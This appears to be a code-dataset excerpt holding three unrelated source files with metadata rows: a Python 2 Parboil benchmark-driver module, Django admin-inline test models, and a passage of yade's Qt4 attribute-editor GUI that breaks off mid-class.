# (c) 2007 The Board of Trustees of the University of Illinois. import sys import os from os import path import re from itertools import imap, repeat, chain import globals import process import parboilfile as pbf from futures import Future from error import ErrorType class Benchmark(object): """A benchmark. If the benchmark is malformed or otherwise invalid, only the 'name' and 'invalid' fields will be set. Otherwise all fields will be set. Fields: name The name of the benchmark. This is also the benchmark directory name. invalid None if the benchmark is valid; otherwise, an exception describing why the benchmark is invalid. path Full path of the benchmark directory. descr A description of the benchmark. impls A dictionary of benchmark source implementations. datas A dictionary of data sets used to run the benchmark.""" def __init__(self, name, path = None, impls = [], datasets = [], description=None, invalid=None): self.name = name self.invalid = invalid if invalid is None: self.path = path self.impls = dict(imap(lambda i: (i.name, i), impls)) self.datas = dict(imap(lambda i: (i.name, i), datasets)) self.descr = description def createFromName(name): """Scan the benchmark directory for the benchmark named 'name' and create a benchmark object for it.""" bmkdir = globals.benchdir.getChildByName(name) datadir = globals.datadir.getChildByName(name) descr = process.read_description_file(bmkdir) try: # Scan implementations of the benchmark impls = [BenchImpl.createFromDir(impl) for impl in process.scan_for_benchmark_versions(bmkdir)] # Scan data sets of the benchmark datas = [BenchDataset.createFromDir(data) for data in process.scan_for_benchmark_datasets(datadir)] # If no exception occurred, the benchmark is valid return Benchmark(name, bmkdir.getPath(), impls, datas, descr) finally: pass #except Exception, e: # return Benchmark(name, invalid=e) createFromName = staticmethod(createFromName) def describe(self): """Return a string describing this benchmark.""" if self.invalid: return "Error in benchmark:\n" + str(self.invalid) if self.descr is None: header = "Benchmark '" + self.name + "'" else: header = self.descr impls = " ".join([impl.name for impl in self.impls.itervalues()]) datas = " ".join([data.name for data in self.datas.itervalues()]) return header + "\nVersions: " + impls + "\nData sets: " + datas def instance_check(x): if not isinstance(x, Benchmark): raise TypeError, "argument must be an instance of Benchmark" instance_check = staticmethod(instance_check) class BenchImpl(object): """An implementation of a benchmark.""" def __init__(self, dir, description=None): if not isinstance(dir, pbf.Directory): raise TypeError, "dir must be a directory" self.name = dir.getName() self.dir = dir self.descr = description def createFromDir(dir): """Scan the directory containing a benchmark implementation and create a BenchImpl object from it.""" # Get the description from a file, if provided descr = process.read_description_file(dir) return BenchImpl(dir, descr) createFromDir = staticmethod(createFromDir) def makefile(self, benchmark, target=None, action=None, platform=None, opt={}): """Run this implementation's makefile.""" self.platform = platform Benchmark.instance_check(benchmark) def perform(): srcdir = path.join('src', self.name) builddir = path.join('build', self.name) if self.platform == None: platform = 'default' else: platform = self.platform env={'SRCDIR':srcdir, 'BUILDDIR':builddir + '_' + platform, 'BIN':path.join(builddir+'_'+platform,benchmark.name), 'PARBOIL_ROOT':globals.root, 
'PLATFORM':platform, 'BUILD':self.name} env.update(opt) mkfile = globals.root + os.sep + 'common' + os.sep + 'mk' # Run the makefile to build the benchmark ret = process.makefile(target=target, action=action, filepath=path.join(mkfile, "Makefile"), env=env) if ret == True: return ErrorType.Success else: return ErrorType.CompileError # Go to the benchmark directory before building return process.with_path(benchmark.path, perform) def build(self, benchmark, platform): """Build an executable of this benchmark implementation.""" return self.makefile(benchmark, action='build', platform=platform) def isBuilt(self, benchmark, platform): """Determine whether the executable is up to date.""" return self.makefile(benchmark, action='q', platform=platform) == ErrorType.Success def clean(self, benchmark, platform): """Remove build files for this benchmark implementation.""" return self.makefile(benchmark, action='clean', platform=platform) def run(self, benchmark, dataset, do_output=True, extra_opts=[], platform=None): """Run this benchmark implementation. Return True if the benchmark terminated normally or False if there was an error.""" if platform == None: self.platform = 'default' else: self.platform = platform # Ensure that the benchmark has been built if not self.isBuilt(benchmark, platform): rc = self.build(benchmark, platform) # Stop if 'make' failed if rc != ErrorType.Success: return rc def perform(): if self.platform == None: platform = 'default' else: platform = self.platform # Run the program #exename = path.join('build', self.name+'_'+platform, benchmark.name) #args = [exename] + extra_opts + dataset.getCommandLineArguments(benchmark, do_output) #rc = process.spawnwaitv(exename, args) args = extra_opts + dataset.getCommandLineArguments(benchmark, do_output) args = reduce(lambda x, y: x + ' ' + y, args) ### try: rc = self.makefile(benchmark, action='run', platform=platform, opt={"ARGS":args}) except KeyboardInterrupt: rc = ErrorType.Killed # Program exited with error? # if rc != 0: return ErrorType.RunFailed # return ErrorType.Success return rc return process.with_path(benchmark.path, perform) def debug(self, benchmark, dataset, do_output=True, extra_opts=[], platform=None): """Debug this benchmark implementation.""" if platform == None: self.platform = 'default' else: self.platform = platform # Ensure that the benchmark has been built if not self.isBuilt(benchmark, platform): rc = self.build(benchmark, platform) # Stop if 'make' failed if rc != ErrorType.Success: return rc def perform(): if self.platform == None: platform = 'default' else: platform = self.platform # Run the program args = extra_opts + dataset.getCommandLineArguments(benchmark, do_output) args = reduce(lambda x, y: x + ' ' + y, args) ### rc = self.makefile(benchmark, action='debug', platform=platform, opt={"ARGS":args}) # Program exited with error? if rc != 0: return ErrorType.RunFailed return ErrorType.Success return process.with_path(benchmark.path, perform) def check(self, benchmark, dataset): """Check the output from the last run of this benchmark implementation. Return True if the output checks successfully or False otherwise.""" def perform(): output_file = dataset.getTemporaryOutputFile(benchmark).getPath() reference_file = dataset.getReferenceOutputPath() compare = os.path.join('tools', 'compare-output') rc = process.spawnwaitl(compare, compare, reference_file, output_file) # Program exited with error, or mismatch in output? 
if rc != 0: return False return True return process.with_path(benchmark.path, perform) def __str__(self): return "<BenchImpl '" + self.name + "'>" class BenchDataset(object): """Data sets for running a benchmark.""" def __init__(self, dir, in_files=[], out_files=[], parameters=[], description=None): if not isinstance(dir, pbf.Directory): raise TypeError, "dir must be a pbf.Directory" self.name = dir.getName() self.dir = dir self.inFiles = in_files self.outFiles = out_files self.parameters = parameters self.descr = description def createFromDir(dir): """Scan the directory containing a dataset and create a BenchDataset object from it.""" # Identify the paths where files may be found input_dir = dir.getChildByName('input') output_dir = dir.getChildByName('output') #benchmark_path = path.join(globals.root, 'benchmarks', name) def check_default_input_files(): # This function is called to see if the input file set # guessed by scanning the input directory can be used if invalid_default_input_files: raise ValueError, "Cannot infer command line when there are multiple input files in a data set\n(Fix by adding an input DESCRIPTION file)" if input_dir.exists(): input_descr = process.read_description_file(input_dir) input_files = input_dir.scanAndReturnNames() # If more than one input file was found, cannot use the default # input file list produced by scanning the directory invalid_default_input_files = len(input_files) > 1 else: # If there's no input directory, assume the benchmark # takes no input input_descr = None input_files = [] invalid_default_input_files = False # Read the text of the input description file if input_descr is not None: (parameters, input_files1, input_descr) = \ unpack_dataset_description(input_descr, input_files=None) if input_files1 is None: # No override value given; use the default check_default_input_files() else: input_files = input_files1 else: check_default_input_files() parameters = [] # Look for output files output_descr = process.read_description_file(output_dir) output_files = output_dir.scanAndReturnNames() if len(output_files) > 1: raise ValueError, "Multiple output files not supported" # Concatenate input and output descriptions if input_descr and output_descr: descr = input_descr + "\n\n" + output_descr else: descr = input_descr or output_descr return BenchDataset(dir, input_files, output_files, parameters, descr) createFromDir = staticmethod(createFromDir) def getName(self): """Get the name of this dataset.""" return self.name def getTemporaryOutputDir(self, benchmark): """Get the pbf.Directory for the output of a benchmark run. This function should always return the same pbf.Directory if its parameters are the same. The output path is not the path where the reference output is stored.""" rundir = globals.benchdir.getChildByName(benchmark.name).getChildByName('run') if rundir.getChildByName(self.name) is None: datasetpath = path.join(rundir.getPath(), self.name) filepath = path.join(datasetpath, self.outFiles[0]) rundir.addChild(pbf.Directory(datasetpath, [pbf.File(filepath, False)])) return rundir.getChildByName(self.name) def getTemporaryOutputFile(self, benchmark): """Get the pbf.File for the output of a benchmark run. This function should always return the same pbf.File if its parameters are the same. 
The output path is not where the reference output is stored.""" return self.getTemporaryOutputDir(benchmark).getChildByName(self.outFiles[0]) def getReferenceOutputPath(self): """Get the name of the reference file, to which the output of a benchmark run should be compared.""" return path.join(self.dir.getPath(), 'output', self.outFiles[0]) def getCommandLineArguments(self, benchmark, do_output=True): """Get the command line arguments that should be passed to the executable to run this data set. If 'do_output' is True, then the executable will be passed flags to save its output to a file. Directories to hold output files are created if they do not exist.""" args = [] # Add arguments to pass input files to the benchmark if self.inFiles: in_files = ",".join([path.join(self.dir.getPath(),'input', x) for x in self.inFiles]) args.append("-i") args.append(in_files) # Add arguments to store the output somewhere, if output is # desired if do_output and self.outFiles: if len(self.outFiles) != 1: raise ValueError, "only one output file is supported" out_file = self.getTemporaryOutputFile(benchmark) args.append("-o") args.append(out_file.getPath()) # Ensure that a directory exists for the output self.getTemporaryOutputDir(benchmark).touch() args += self.parameters return args def __str__(self): return "<BenchData '" + self.name + "'>" def unpack_dataset_description(descr, parameters=[], input_files=[]): """Read information from the raw contents of a data set description file. Optional 'parameters' and 'input_files' arguments may be given, which will be retained unless overridden by the description file.""" leftover = [] split_at_colon = re.compile(r"^\s*([a-zA-Z]+)\s*:(.*)$") # Initialize these to None (no override found yet) parameter_text = None input_file_text = None # Scan the description line by line for line in descr.split('\n'): m = split_at_colon.match(line) if m is None: continue # This line appears to declare something that should be # interpreted keyword = m.group(1) if keyword == "Parameters": parameter_text = m.group(2) elif keyword == "Inputs": input_file_text = m.group(2) # else, ignore the line # Split the strings into (possibly) multiple arguments, discarding # whitespace if parameter_text is not None: parameters = parameter_text.split() if input_file_text is not None: input_files = input_file_text.split() return (parameters, input_files, descr) def version_scanner(): """version_scanner() -> (path -> pbf.Directory) Return a function to find benchmark versions in the src directory for the benchmark.""" return lambda x: pbf.scan_file(x, True, lambda y: pbf.Directory(y), ['.svn']) def find_benchmarks(): """Find benchmarks in the repository. The benchmarks are identified, but their contents are not scanned immediately. A dictionary is returned mapping benchmark names to futures containing the benchmarks.""" if not globals.root: raise ValueError, "root directory has not been set" # Scan all benchmarks in the 'benchmarks' directory and # lazily create benchmark objects. 
db = {} try: globals.benchdir.scan() globals.datadir.scan() for bmkdir in globals.benchdir.getScannedChildren(): bmk = Future(lambda bmkdir=bmkdir: Benchmark.createFromName(bmkdir.getName())) db[bmkdir.getName()] = bmk except OSError, e: sys.stdout.write("Benchmark directory not found!\n\n") return {} return db def _desc_file(dpath): """_desc_file(dpath) Returns a pbf.File for an optional description file in the directory dpath.""" return pbf.File(path.join(dpath,'DESCRIPTION'), False) def benchmark_scanner(): """benchmark_scanner -> (path -> pbf.Directory) Returns a function which will scan a filename and create a pbf.Directory for a benchmark represented by that name.""" def create_benchmark_dir(dpath): expected = [pbf.Directory(path.join(dpath,'src'), [], version_scanner()), pbf.Directory(path.join(dpath,'tools'), [pbf.File(path.join(dpath,'compare-output'))]), pbf.Directory(path.join(dpath,'build'), must_exist=False), pbf.Directory(path.join(dpath,'run'), must_exist=False), _desc_file(dpath)] return pbf.Directory(dpath, expected) return lambda x: pbf.scan_file(x, True, create_benchmark_dir,['_darcs','.svn']) def dataset_scanner(): """dataset_scanner -> (path -> pbf.Directory) Returns a function which will scan a filename and create a pbf.Directory for a folder containing datasets for the benchmark of the same name.""" def create_dataset_dir(dpath): simple_scan = lambda x: pbf.scan_file(x) expected = [pbf.Directory(path.join(dpath,'input'), [_desc_file(path.join(dpath,'input'))], simple_scan), pbf.Directory(path.join(dpath,'output'), [], simple_scan), _desc_file(dpath)] return pbf.Directory(dpath, expected) return lambda x: pbf.scan_file(x, True, create_dataset_dir, ['.svn', '_darcs']) def dataset_repo_scanner(): """dataset_repo_scanner -> (path -> pbf.Directory) Returns a function which will scan a filename and create a pbf.Directory for a folder containing a dataset repository for parboil benchmarks.""" benchmark_dsets_scanner = lambda x: pbf.Directory(x, [], dataset_scanner()) return lambda x: pbf.scan_file(x, True, benchmark_dsets_scanner)
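
A hedged driver sketch for the module above; it assumes the parboil entry point has already populated globals.root, globals.benchdir and globals.datadir, which find_benchmarks() and the scanners require:

db = find_benchmarks()
for name in sorted(db):
    # The dictionary maps names to futures; createFromName scans one
    # benchmark eagerly and returns a Benchmark (possibly invalid).
    bmk = Benchmark.createFromName(name)
    print(bmk.describe())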
mit
-8,829,396,101,898,536,000
35.921002
154
0.608235
false
theo-l/django
tests/admin_inlines/models.py
10
7855
""" Testing of admin inline formsets. """ import random from django.contrib.contenttypes.fields import GenericForeignKey from django.contrib.contenttypes.models import ContentType from django.db import models class Parent(models.Model): name = models.CharField(max_length=50) def __str__(self): return self.name class Teacher(models.Model): name = models.CharField(max_length=50) def __str__(self): return self.name class Child(models.Model): name = models.CharField(max_length=50) teacher = models.ForeignKey(Teacher, models.CASCADE) content_type = models.ForeignKey(ContentType, models.CASCADE) object_id = models.PositiveIntegerField() parent = GenericForeignKey() def __str__(self): return 'I am %s, a child of %s' % (self.name, self.parent) class Book(models.Model): name = models.CharField(max_length=50) def __str__(self): return self.name class Author(models.Model): name = models.CharField(max_length=50) books = models.ManyToManyField(Book) class NonAutoPKBook(models.Model): rand_pk = models.IntegerField(primary_key=True, editable=False) author = models.ForeignKey(Author, models.CASCADE) title = models.CharField(max_length=50) def save(self, *args, **kwargs): while not self.rand_pk: test_pk = random.randint(1, 99999) if not NonAutoPKBook.objects.filter(rand_pk=test_pk).exists(): self.rand_pk = test_pk super().save(*args, **kwargs) class NonAutoPKBookChild(NonAutoPKBook): pass class EditablePKBook(models.Model): manual_pk = models.IntegerField(primary_key=True) author = models.ForeignKey(Author, models.CASCADE) title = models.CharField(max_length=50) class Holder(models.Model): dummy = models.IntegerField() class Inner(models.Model): dummy = models.IntegerField() holder = models.ForeignKey(Holder, models.CASCADE) readonly = models.CharField("Inner readonly label", max_length=1) def get_absolute_url(self): return '/inner/' class Holder2(models.Model): dummy = models.IntegerField() class Inner2(models.Model): dummy = models.IntegerField() holder = models.ForeignKey(Holder2, models.CASCADE) class Holder3(models.Model): dummy = models.IntegerField() class Inner3(models.Model): dummy = models.IntegerField() holder = models.ForeignKey(Holder3, models.CASCADE) # Models for ticket #8190 class Holder4(models.Model): dummy = models.IntegerField() class Inner4Stacked(models.Model): dummy = models.IntegerField(help_text="Awesome stacked help text is awesome.") holder = models.ForeignKey(Holder4, models.CASCADE) class Meta: constraints = [ models.UniqueConstraint(fields=['dummy', 'holder'], name='unique_stacked_dummy_per_holder') ] class Inner4Tabular(models.Model): dummy = models.IntegerField(help_text="Awesome tabular help text is awesome.") holder = models.ForeignKey(Holder4, models.CASCADE) class Meta: constraints = [ models.UniqueConstraint(fields=['dummy', 'holder'], name='unique_tabular_dummy_per_holder') ] # Models for ticket #31441 class Holder5(models.Model): dummy = models.IntegerField() class Inner5Stacked(models.Model): name = models.CharField(max_length=10) select = models.CharField(choices=(('1', 'One'), ('2', 'Two')), max_length=10) text = models.TextField() dummy = models.IntegerField() holder = models.ForeignKey(Holder5, models.CASCADE) class Inner5Tabular(models.Model): name = models.CharField(max_length=10) select = models.CharField(choices=(('1', 'One'), ('2', 'Two')), max_length=10) text = models.TextField() dummy = models.IntegerField() holder = models.ForeignKey(Holder5, models.CASCADE) # Models for #12749 class Person(models.Model): firstname = models.CharField(max_length=15) class 
OutfitItem(models.Model): name = models.CharField(max_length=15) class Fashionista(models.Model): person = models.OneToOneField(Person, models.CASCADE, primary_key=True) weaknesses = models.ManyToManyField(OutfitItem, through='ShoppingWeakness', blank=True) class ShoppingWeakness(models.Model): fashionista = models.ForeignKey(Fashionista, models.CASCADE) item = models.ForeignKey(OutfitItem, models.CASCADE) # Models for #13510 class TitleCollection(models.Model): pass class Title(models.Model): collection = models.ForeignKey(TitleCollection, models.SET_NULL, blank=True, null=True) title1 = models.CharField(max_length=100) title2 = models.CharField(max_length=100) # Models for #15424 class Poll(models.Model): name = models.CharField(max_length=40) class Question(models.Model): text = models.CharField(max_length=40) poll = models.ForeignKey(Poll, models.CASCADE) class Novel(models.Model): name = models.CharField(max_length=40) class NovelReadonlyChapter(Novel): class Meta: proxy = True class Chapter(models.Model): name = models.CharField(max_length=40) novel = models.ForeignKey(Novel, models.CASCADE) class FootNote(models.Model): """ Model added for ticket 19838 """ chapter = models.ForeignKey(Chapter, models.PROTECT) note = models.CharField(max_length=40) # Models for #16838 class CapoFamiglia(models.Model): name = models.CharField(max_length=100) class Consigliere(models.Model): name = models.CharField(max_length=100, help_text='Help text for Consigliere') capo_famiglia = models.ForeignKey(CapoFamiglia, models.CASCADE, related_name='+') class SottoCapo(models.Model): name = models.CharField(max_length=100) capo_famiglia = models.ForeignKey(CapoFamiglia, models.CASCADE, related_name='+') class ReadOnlyInline(models.Model): name = models.CharField(max_length=100, help_text='Help text for ReadOnlyInline') capo_famiglia = models.ForeignKey(CapoFamiglia, models.CASCADE) # Models for #18433 class ParentModelWithCustomPk(models.Model): my_own_pk = models.CharField(max_length=100, primary_key=True) name = models.CharField(max_length=100) class ChildModel1(models.Model): my_own_pk = models.CharField(max_length=100, primary_key=True) name = models.CharField(max_length=100) parent = models.ForeignKey(ParentModelWithCustomPk, models.CASCADE) def get_absolute_url(self): return '/child_model1/' class ChildModel2(models.Model): my_own_pk = models.CharField(max_length=100, primary_key=True) name = models.CharField(max_length=100) parent = models.ForeignKey(ParentModelWithCustomPk, models.CASCADE) def get_absolute_url(self): return '/child_model2/' # Models for #19425 class BinaryTree(models.Model): name = models.CharField(max_length=100) parent = models.ForeignKey('self', models.SET_NULL, null=True, blank=True) # Models for #19524 class LifeForm(models.Model): pass class ExtraTerrestrial(LifeForm): name = models.CharField(max_length=100) class Sighting(models.Model): et = models.ForeignKey(ExtraTerrestrial, models.CASCADE) place = models.CharField(max_length=100) # Models for #18263 class SomeParentModel(models.Model): name = models.CharField(max_length=1) class SomeChildModel(models.Model): name = models.CharField(max_length=1) position = models.PositiveIntegerField() parent = models.ForeignKey(SomeParentModel, models.CASCADE) readonly_field = models.CharField(max_length=1) # Other models class ProfileCollection(models.Model): pass class Profile(models.Model): collection = models.ForeignKey(ProfileCollection, models.SET_NULL, blank=True, null=True) first_name = models.CharField(max_length=100) last_name = 
models.CharField(max_length=100)
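
A hedged Django-shell sketch against the models above (assuming the app's tables exist); it shows the random primary key that NonAutoPKBook.save() assigns on first save:

author = Author.objects.create(name='anne')
book = NonAutoPKBook(author=author, title='a title')
book.save()  # save() loops until it finds an unused rand_pk in [1, 99999]
assert 1 <= book.rand_pk <= 99999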
bsd-3-clause
4,038,649,694,587,854,300
24.669935
103
0.708466
false
bchareyre/ratchet
gui/qt4/SerializableEditor.py
1
34633
# encoding: utf-8 from PyQt4.QtCore import * from PyQt4.QtGui import * from PyQt4 import QtGui import re,itertools import logging logging.trace=logging.debug logging.basicConfig(level=logging.INFO) from yade import * import yade.qt try: from minieigen import * except ImportError: from miniEigen import * seqSerializableShowType=True # show type headings in serializable sequences (takes vertical space, but makes the type hyperlinked) # BUG: cursor is moved to the beginning of the input field even if it has focus # # checking for focus seems to return True always and cursor is never moved # # the 'True or' part effectively disables the condition (so that the cursor is moved always), but it might be fixed in the future somehow # # if True or w.hasFocus(): w.home(False) # # def makeWrapperHref(text,className,attr=None,static=False): """Create clickable HTML hyperlink to a Yade class or its attribute. :param className: name of the class to link to. :param attr: attribute to link to. If given, must exist directly in given *className*; if not given or empty, link to the class itself is created and *attr* is ignored. :return: HTML with the hyperref. """ if not static: return '<a href="%s#yade.wrapper.%s%s">%s</a>'%(yade.qt.sphinxDocWrapperPage,className,(('.'+attr) if attr else ''),text) else: return '<a href="%s#ystaticattr-%s.%s">%s</a>'%(yade.qt.sphinxDocWrapperPage,className,attr,text) def serializableHref(ser,attr=None,text=None): """Return HTML href to a *ser* optionally to the attribute *attr*. The class hierarchy is crawled upwards to find out in which parent class *attr* is defined, so that the href target is a valid link. In that case, only single inheritance is assumed and the first class from the top defining *attr* is used. :param ser: object of class deriving from :yref:`Serializable`, or string; if string, *attr* must be empty. :param attr: name of the attribute to link to; if empty, link to the class itself is created. :param text: visible text of the hyperlink; if not given, either class name or attribute name without class name (when *attr* is not given) is used. :returns: HTML with the hyperref. """ # klass is a class name given as string if isinstance(ser,str): if attr: raise ValueError("When *ser* is a string, *attr* must be empty (only class link can be created)") return makeWrapperHref(text if text else ser,ser) # klass is a type object if attr: klass=ser.__class__ while attr in dir(klass.__bases__[0]): klass=klass.__bases__[0] if not text: text=attr else: klass=ser.__class__ if not text: text=klass.__name__ return makeWrapperHref(text,klass.__name__,attr,static=(attr and getattr(klass,attr)==getattr(ser,attr))) class AttrEditor(): """Abstract base class handling some aspects common to all attribute editors. Holds exactly one attribute which is updated whenever it changes.""" def __init__(self,getter=None,setter=None): self.getter,self.setter=getter,setter self.hot,self.focused=False,False self.widget=None def refresh(self): pass def update(self): pass def isHot(self,hot=True): "Called when the widget gets focus; mark it hot, change colors etc." 
if hot==self.hot: return self.hot=hot if hot: self.setStyleSheet('QWidget { background: red }') else: self.setStyleSheet('QWidget { background: none }') def sizeHint(self): return QSize(150,12) def trySetter(self,val): try: self.setter(val) except AttributeError: self.setEnabled(False) self.isHot(False) class AttrEditor_Bool(AttrEditor,QFrame): def __init__(self,parent,getter,setter): AttrEditor.__init__(self,getter,setter) QFrame.__init__(self,parent) self.checkBox=QCheckBox(self) lay=QVBoxLayout(self); lay.setSpacing(0); lay.setMargin(0); lay.addStretch(1); lay.addWidget(self.checkBox); lay.addStretch(1) self.checkBox.clicked.connect(self.update) def refresh(self): self.checkBox.setChecked(self.getter()) def update(self): self.trySetter(self.checkBox.isChecked()) class AttrEditor_Int(AttrEditor,QSpinBox): def __init__(self,parent,getter,setter): AttrEditor.__init__(self,getter,setter) QSpinBox.__init__(self,parent) self.setRange(int(-1e9),int(1e9)); self.setSingleStep(1); self.valueChanged.connect(self.update) def refresh(self): self.setValue(self.getter()) def update(self): self.trySetter(self.value()) class AttrEditor_Str(AttrEditor,QLineEdit): def __init__(self,parent,getter,setter): AttrEditor.__init__(self,getter,setter) QLineEdit.__init__(self,parent) self.textEdited.connect(self.isHot) self.selectionChanged.connect(self.isHot) self.editingFinished.connect(self.update) def refresh(self): self.setText(self.getter()) def update(self): self.trySetter(str(self.text())) class AttrEditor_Float(AttrEditor,QLineEdit): def __init__(self,parent,getter,setter): AttrEditor.__init__(self,getter,setter) QLineEdit.__init__(self,parent) self.textEdited.connect(self.isHot) self.selectionChanged.connect(self.isHot) self.editingFinished.connect(self.update) def refresh(self): self.setText(str(self.getter())); if True or not self.hasFocus(): self.home(False) def update(self): try: self.trySetter(float(self.text())) except ValueError: self.refresh() class AttrEditor_Quaternion(AttrEditor,QFrame): def __init__(self,parent,getter,setter): AttrEditor.__init__(self,getter,setter) QFrame.__init__(self,parent) self.grid=QHBoxLayout(self); self.grid.setSpacing(0); self.grid.setMargin(0) for i in range(4): if i==3: f=QFrame(self); f.setFrameShape(QFrame.VLine); f.setFrameShadow(QFrame.Sunken); f.setFixedWidth(4) # add vertical divider (axis | angle) self.grid.addWidget(f) w=QLineEdit('') self.grid.addWidget(w); w.textEdited.connect(self.isHot) w.selectionChanged.connect(self.isHot) w.editingFinished.connect(self.update) def refresh(self): val=self.getter(); axis,angle=val.toAxisAngle() for i in (0,1,2,4): w=self.grid.itemAt(i).widget(); w.setText(str(axis[i] if i<3 else angle)); if True or not w.hasFocus(): w.home(False) def update(self): try: x=[float((self.grid.itemAt(i).widget().text())) for i in (0,1,2,4)] except ValueError: self.refresh() q=Quaternion(Vector3(x[0],x[1],x[2]),x[3]); q.normalize() # from axis-angle self.trySetter(q) def setFocus(self): self.grid.itemAt(0).widget().setFocus() class AttrEditor_Se3(AttrEditor,QFrame): def __init__(self,parent,getter,setter): AttrEditor.__init__(self,getter,setter) QFrame.__init__(self,parent) self.grid=QGridLayout(self); self.grid.setSpacing(0); self.grid.setMargin(0) for row,col in itertools.product(range(2),range(5)): # one additional column for vertical line in quaternion if (row,col)==(0,3): continue if (row,col)==(0,4): self.grid.addWidget(QLabel(u'←<i>pos</i> ↙<i>ori</i>',self),row,col); continue if (row,col)==(1,3): f=QFrame(self); 
f.setFrameShape(QFrame.VLine); f.setFrameShadow(QFrame.Sunken); f.setFixedWidth(4); self.grid.addWidget(f,row,col); continue w=QLineEdit('') self.grid.addWidget(w,row,col); w.textEdited.connect(self.isHot) w.selectionChanged.connect(self.isHot) w.editingFinished.connect(self.update) def refresh(self): pos,ori=self.getter(); axis,angle=ori.toAxisAngle() for i in (0,1,2,4): w=self.grid.itemAtPosition(1,i).widget(); w.setText(str(axis[i] if i<3 else angle)); if True or not w.hasFocus(): w.home(False) for i in (0,1,2): w=self.grid.itemAtPosition(0,i).widget(); w.setText(str(pos[i])); if True or not w.hasFocus(): w.home(False) def update(self): try: q=[float((self.grid.itemAtPosition(1,i).widget().text())) for i in (0,1,2,4)] v=[float((self.grid.itemAtPosition(0,i).widget().text())) for i in (0,1,2)] except ValueError: self.refresh() qq=Quaternion(Vector3(q[0],q[1],q[2]),q[3]); qq.normalize() # from axis-angle self.trySetter((v,qq)) def setFocus(self): self.grid.itemAtPosition(0,0).widget().setFocus() class AttrEditor_MatrixX(AttrEditor,QFrame): def __init__(self,parent,getter,setter,rows,cols,idxConverter): 'idxConverter converts row,col tuple to either (row,col), (col) etc depending on what access is used for []' AttrEditor.__init__(self,getter,setter) QFrame.__init__(self,parent) self.rows,self.cols=rows,cols self.idxConverter=idxConverter self.setContentsMargins(0,0,0,0) val=self.getter() self.grid=QGridLayout(self); self.grid.setSpacing(0); self.grid.setMargin(0) for row,col in itertools.product(range(self.rows),range(self.cols)): w=QLineEdit('') self.grid.addWidget(w,row,col); w.textEdited.connect(self.isHot) w.selectionChanged.connect(self.isHot) w.editingFinished.connect(self.update) def refresh(self): val=self.getter() for row,col in itertools.product(range(self.rows),range(self.cols)): w=self.grid.itemAtPosition(row,col).widget() w.setText(str(val[self.idxConverter(row,col)])) if True or not w.hasFocus: w.home(False) # make the left-most part visible, if the text is wider than the widget def update(self): try: val=self.getter() for row,col in itertools.product(range(self.rows),range(self.cols)): w=self.grid.itemAtPosition(row,col).widget() if w.isModified(): val[self.idxConverter(row,col)]=float(w.text()) logging.debug('setting'+str(val)) self.trySetter(val) except ValueError: self.refresh() def setFocus(self): self.grid.itemAtPosition(0,0).widget().setFocus() class AttrEditor_MatrixXi(AttrEditor,QFrame): def __init__(self,parent,getter,setter,rows,cols,idxConverter): 'idxConverter converts row,col tuple to either (row,col), (col) etc depending on what access is used for []' AttrEditor.__init__(self,getter,setter) QFrame.__init__(self,parent) self.rows,self.cols=rows,cols self.idxConverter=idxConverter self.setContentsMargins(0,0,0,0) self.grid=QGridLayout(self); self.grid.setSpacing(0); self.grid.setMargin(0) for row,col in itertools.product(range(self.rows),range(self.cols)): w=QSpinBox() w.setRange(int(-1e9),int(1e9)); w.setSingleStep(1); self.grid.addWidget(w,row,col); self.refresh() # refresh before connecting signals! 
for row,col in itertools.product(range(self.rows),range(self.cols)): self.grid.itemAtPosition(row,col).widget().valueChanged.connect(self.update) def refresh(self): val=self.getter() for row,col in itertools.product(range(self.rows),range(self.cols)): w=self.grid.itemAtPosition(row,col).widget().setValue(val[self.idxConverter(row,col)]) def update(self): val=self.getter(); modified=False for row,col in itertools.product(range(self.rows),range(self.cols)): w=self.grid.itemAtPosition(row,col).widget() if w.value()!=val[self.idxConverter(row,col)]: modified=True; val[self.idxConverter(row,col)]=w.value() if not modified: return logging.debug('setting'+str(val)) self.trySetter(val) def setFocus(self): self.grid.itemAtPosition(0,0).widget().setFocus() class AttrEditor_Vector6i(AttrEditor_MatrixXi): def __init__(self,parent,getter,setter): AttrEditor_MatrixXi.__init__(self,parent,getter,setter,1,6,lambda r,c:c) class AttrEditor_Vector3i(AttrEditor_MatrixXi): def __init__(self,parent,getter,setter): AttrEditor_MatrixXi.__init__(self,parent,getter,setter,1,3,lambda r,c:c) class AttrEditor_Vector2i(AttrEditor_MatrixXi): def __init__(self,parent,getter,setter): AttrEditor_MatrixXi.__init__(self,parent,getter,setter,1,2,lambda r,c:c) class AttrEditor_Vector6(AttrEditor_MatrixX): def __init__(self,parent,getter,setter): AttrEditor_MatrixX.__init__(self,parent,getter,setter,1,6,lambda r,c:c) class AttrEditor_Vector3(AttrEditor_MatrixX): def __init__(self,parent,getter,setter): AttrEditor_MatrixX.__init__(self,parent,getter,setter,1,3,lambda r,c:c) class AttrEditor_Vector2(AttrEditor_MatrixX): def __init__(self,parent,getter,setter): AttrEditor_MatrixX.__init__(self,parent,getter,setter,1,2,lambda r,c:c) class AttrEditor_Matrix3(AttrEditor_MatrixX): def __init__(self,parent,getter,setter): AttrEditor_MatrixX.__init__(self,parent,getter,setter,3,3,lambda r,c:(r,c)) class Se3FakeType: pass _fundamentalEditorMap={bool:AttrEditor_Bool,str:AttrEditor_Str,int:AttrEditor_Int,float:AttrEditor_Float,Quaternion:AttrEditor_Quaternion,Vector2:AttrEditor_Vector2,Vector3:AttrEditor_Vector3,Vector6:AttrEditor_Vector6,Matrix3:AttrEditor_Matrix3,Vector6i:AttrEditor_Vector6i,Vector3i:AttrEditor_Vector3i,Vector2i:AttrEditor_Vector2i,Se3FakeType:AttrEditor_Se3} _fundamentalInitValues={bool:True,str:'',int:0,float:0.0,Quaternion:Quaternion((0,1,0),0.0),Vector3:Vector3.Zero,Matrix3:Matrix3.Zero,Vector6:Vector6.Zero,Vector6i:Vector6i.Zero,Vector3i:Vector3i.Zero,Vector2i:Vector2i.Zero,Vector2:Vector2.Zero,Se3FakeType:(Vector3.Zero,Quaternion((0,1,0),0.0))} class SerQLabel(QLabel): def __init__(self,parent,label,tooltip,path): QLabel.__init__(self,parent) self.path=path self.setText(label) if tooltip or path: self.setToolTip(('<b>'+path+'</b><br>' if self.path else '')+(tooltip if tooltip else '')) self.linkActivated.connect(yade.qt.openUrl) def mousePressEvent(self,event): if event.button()!=Qt.MidButton: event.ignore(); return # middle button clicked, paste pasteText to clipboard cb=QApplication.clipboard() cb.setText(self.path,mode=QClipboard.Clipboard) cb.setText(self.path,mode=QClipboard.Selection) # X11 global selection buffer event.accept() class SerializableEditor(QFrame): "Class displaying and modifying serializable attributes of a yade object." 
